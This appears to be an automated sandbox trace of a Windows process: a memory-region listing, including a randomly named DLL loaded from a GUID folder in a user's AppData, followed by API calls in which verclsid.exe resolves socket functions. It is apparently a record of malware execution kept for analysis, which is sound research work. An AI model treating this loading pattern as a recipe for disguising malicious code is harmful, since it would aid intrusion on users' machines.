id = 2060
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2061
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2062
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2063
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2064
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2065
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2066
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2067
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2068
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2111
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2112
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2113
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2114
start_va = 0x450000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 2115
start_va = 0xc0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2116
start_va = 0x450000
end_va = 0x5d7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000450000"
filename = ""
Region:
id = 2117
start_va = 0x5f0000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005f0000"
filename = ""
Region:
id = 2118
start_va = 0x250000
end_va = 0x278fff
monitored = 0
entry_point = 0x251010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2119
start_va = 0x350000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 2120
start_va = 0x250000
end_va = 0x278fff
monitored = 0
entry_point = 0x251010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2121
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2122
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2123
start_va = 0x600000
end_va = 0x780fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 2124
start_va = 0x790000
end_va = 0x1b8ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000790000"
filename = ""
Region:
id = 2129
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2130
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2131
start_va = 0x250000
end_va = 0x2ccfff
monitored = 0
entry_point = 0x25cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2132
start_va = 0x250000
end_va = 0x2ccfff
monitored = 0
entry_point = 0x25cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2133
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2134
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2135
start_va = 0x1b90000
end_va = 0x1d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b90000"
filename = ""
Region:
id = 2136
start_va = 0x250000
end_va = 0x32efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 2137
start_va = 0x7fefa140000
end_va = 0x7fefa196fff
monitored = 0
entry_point = 0x7fefa141118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 2138
start_va = 0x330000
end_va = 0x330fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000330000"
filename = ""
Region:
id = 2139
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2140
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2141
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2142
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2143
start_va = 0x340000
end_va = 0x340fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 2144
start_va = 0x1b90000
end_va = 0x1bd2fff
monitored = 1
entry_point = 0x1bb8ed0
region_type = mapped_file
name = "b79266.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")
Region:
id = 2145
start_va = 0x1ca0000
end_va = 0x1d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ca0000"
filename = ""
Region:
id = 2146
start_va = 0x7fefb1b0000
end_va = 0x7fefb1c7fff
monitored = 0
entry_point = 0x7fefb1b1010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 2147
start_va = 0x7fef79b0000
end_va = 0x7fef79b8fff
monitored = 0
entry_point = 0x7fef79b1070
region_type = mapped_file
name = "wsock32.dll"
filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll")
Region:
id = 2163
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2164
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2165
start_va = 0x1d20000
end_va = 0x1eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d20000"
filename = ""
Region:
id = 2166
start_va = 0x1d20000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d20000"
filename = ""
Region:
id = 2167
start_va = 0x1e70000
end_va = 0x1eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e70000"
filename = ""
Region:
id = 2168
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2169
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2170
start_va = 0x7fefdba0000
end_va = 0x7fefdd17fff
monitored = 0
entry_point = 0x7fefdba10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 2171
start_va = 0x7fefdd20000
end_va = 0x7fefde49fff
monitored = 0
entry_point = 0x7fefdd210d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 2172
start_va = 0x7feff170000
end_va = 0x7feff3c8fff
monitored = 0
entry_point = 0x7feff171340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 2173
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2174
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2175
start_va = 0x7fefb2c0000
end_va = 0x7fefb2e6fff
monitored = 0
entry_point = 0x7fefb2c98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2176
start_va = 0x7fefb2b0000
end_va = 0x7fefb2bafff
monitored = 0
entry_point = 0x7fefb2b1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2177
start_va = 0x1ef0000
end_va = 0x21befff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2178
start_va = 0x5e0000
end_va = 0x5e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 2179
start_va = 0x7fefc180000
end_va = 0x7fefc2abfff
monitored = 0
entry_point = 0x7fefc1894bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2180
start_va = 0x1be0000
end_va = 0x1be1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001be0000"
filename = ""
Region:
id = 2181
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 2182
start_va = 0x1bf0000
end_va = 0x1bf0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 2183
start_va = 0x1c00000
end_va = 0x1c01fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c00000"
filename = ""
Region:
id = 2184
start_va = 0x7fef5740000
end_va = 0x7fef62f6fff
monitored = 0
entry_point = 0x7fef5741bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 2185
start_va = 0x77a50000
end_va = 0x77a56fff
monitored = 0
entry_point = 0x77a5106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 2186
start_va = 0x7fef56e0000
end_va = 0x7fef5733fff
monitored = 0
entry_point = 0x7fef56e104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 2187
start_va = 0x1bf0000
end_va = 0x1bf0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 2188
start_va = 0x1c10000
end_va = 0x1c11fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c10000"
filename = ""
Region:
id = 2189
start_va = 0x2230000
end_va = 0x22affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 2190
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2191
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2192
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2193
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2194
start_va = 0x1c20000
end_va = 0x1c2cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 2195
start_va = 0x2310000
end_va = 0x238ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 2196
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2197
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2198
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2199
start_va = 0x1c30000
end_va = 0x1c33fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 2200
start_va = 0x1c40000
end_va = 0x1c67fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 2201
start_va = 0x1c70000
end_va = 0x1c70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c70000"
filename = ""
Region:
id = 2202
start_va = 0x2390000
end_va = 0x2490fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 2203
start_va = 0x2390000
end_va = 0x2490fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 2204
start_va = 0x2390000
end_va = 0x2490fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 2205
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2206
start_va = 0x1c30000
end_va = 0x1c33fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2207
start_va = 0x21c0000
end_va = 0x21effff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 2208
start_va = 0x1c80000
end_va = 0x1c83fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2209
start_va = 0x2390000
end_va = 0x23f5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 2210
start_va = 0x1c90000
end_va = 0x1c9dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 2211
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2212
start_va = 0x1e60000
end_va = 0x1e60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e60000"
filename = ""
Region:
id = 2213
start_va = 0x24e0000
end_va = 0x255ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 2214
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Thread:
id = 104
os_tid = 0xce0
[0380.422] GetCurrentThreadId () returned 0xce0
[0380.423] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x377870
[0380.424] SetThreadLocale (Locale=0x400) returned 1
[0380.426] GetVersion () returned 0x1db10106
[0380.426] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0380.426] GetProcAddress (hModule=0x77660000, lpProcName="GetThreadPreferredUILanguages") returned 0x77664fd0
[0380.426] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0380.426] GetProcAddress (hModule=0x77660000, lpProcName="SetThreadPreferredUILanguages") returned 0x77663d40
[0380.426] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0380.426] GetProcAddress (hModule=0x77660000, lpProcName="GetThreadUILanguage") returned 0x776abba0
[0380.427] GetSystemInfo (in: lpSystemInfo=0x24d880 | out: lpSystemInfo=0x24d880*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06))
[0380.427] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0380.427] GetStartupInfoW (in: lpStartupInfo=0x24d848 | out: lpStartupInfo=0x24d848*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xf, hStdOutput=0x21d800000004, hStdError=0x6a06000600010000))
[0380.427] GetACP () returned 0x4e4
[0380.427] GetCurrentThreadId () returned 0xce0
[0380.427] GetVersion () returned 0x1db10106
[0380.427] GetVersionExW (in: lpVersionInformation=0x24d79c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0xfd92bf92, dwPlatformId=0x7fe, szCSDVersion="\ⓘ∀) | out: lpVersionInformation=0x24d79c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0380.428] LoadLibraryW (lpLibFileName="wsock32.dll") returned 0x7fef79b0000
[0381.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.250] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1d20000
[0381.251] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11
[0381.251] GetProcAddress (hModule=0x7fef79b0000, lpProcName="closesocket") returned 0x7feffa118e0
[0381.251] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x1e58d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="select", lpUsedDefaultChar=0x0) returned 6
[0381.252] GetProcAddress (hModule=0x7fef79b0000, lpProcName="select") returned 0x7feffa14da0
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x1e58d00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recvfrom", lpUsedDefaultChar=0x0) returned 8
[0381.252] GetProcAddress (hModule=0x7fef79b0000, lpProcName="recvfrom") returned 0x7fef79b17ac
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x1e58d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sendto", lpUsedDefaultChar=0x0) returned 6
[0381.252] GetProcAddress (hModule=0x7fef79b0000, lpProcName="sendto") returned 0x7feffa1d7f0
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x1e58d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_addr", lpUsedDefaultChar=0x0) returned 9
[0381.252] GetProcAddress (hModule=0x7fef79b0000, lpProcName="inet_addr") returned 0x7feffa11350
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x1e58d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5
[0381.253] GetProcAddress (hModule=0x7fef79b0000, lpProcName="htons") returned 0x7feffa11250
